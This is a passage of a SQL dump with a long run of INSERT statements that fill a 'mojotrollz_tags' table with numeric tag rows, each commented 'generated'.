0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1144, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1146, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1146, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1147, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1147, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1148, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1148, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1149, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1149, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1150, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1150, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1151, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1151, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1152, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1152, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1153, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1153, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1154, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1154, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1155, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1155, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1156, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1156, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1157, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1158, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1159, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1159, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1160, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1161, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1161, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1162, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1162, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1163, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1163, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1164, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1164, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1165, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1165, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1166, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1166, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1167, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1169, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1169, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1172, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1172, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1173, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1173, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1174, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1174, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1175, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1175, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1176, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1176, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1177, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1178, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1178, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1179, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1179, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1180, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1180, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1181, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1181, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1182, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1182, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1183, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1183, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1184, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1184, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1185, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1185, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1186, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1186, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1187, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1187, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1188, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1189, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1189, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1190, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1191, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1191, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1192, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1192, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1193, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1193, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1194, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1194, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1195, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1195, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1196, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1196, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1197, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1197, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1198, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1198, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1199, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1199, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1200, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1200, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1201, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1201, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1202, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1202, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1203, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1204, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1205, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1205, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1206, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1206, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1207, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1207, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1210, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1210, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1211, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1211, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1212, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1212, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1213, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1213, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1214, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1214, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1215, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1215, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1216, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1216, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1217, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1217, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1218, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1222, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1222, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1224, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1224, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1225, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1225, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1226, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1226, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1228, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1228, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1229, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1229, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1231, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1231, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1232, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1232, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1234, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1234, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1236, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1236, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1237, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1237, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1238, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1238, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1239, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1239, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1240, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1240, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1241, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1241, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1242, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1242, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1243, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1243, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1244, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1244, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1245, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1245, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1246, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1246, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1247, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1247, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1249, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1249, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1250, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1250, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1251, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1251, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1252, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1252, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1253, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1253, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1254, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1254, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1255, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1255, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1256, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1256, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1257, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1257, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1258, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1258, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1259, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1259, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1260, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1260, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1261, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1261, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1263, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1263, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1265, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1265, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1266, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1267, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1267, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1268, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1268, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1269, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1269, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1270, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1270, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1271, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1271, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1273, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1273, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1274, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1274, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1275, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1275, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1276, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1277, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1278, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1278, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1279, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1279, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1280, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1280, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1281, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1281, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1282, 1, 1, 0, 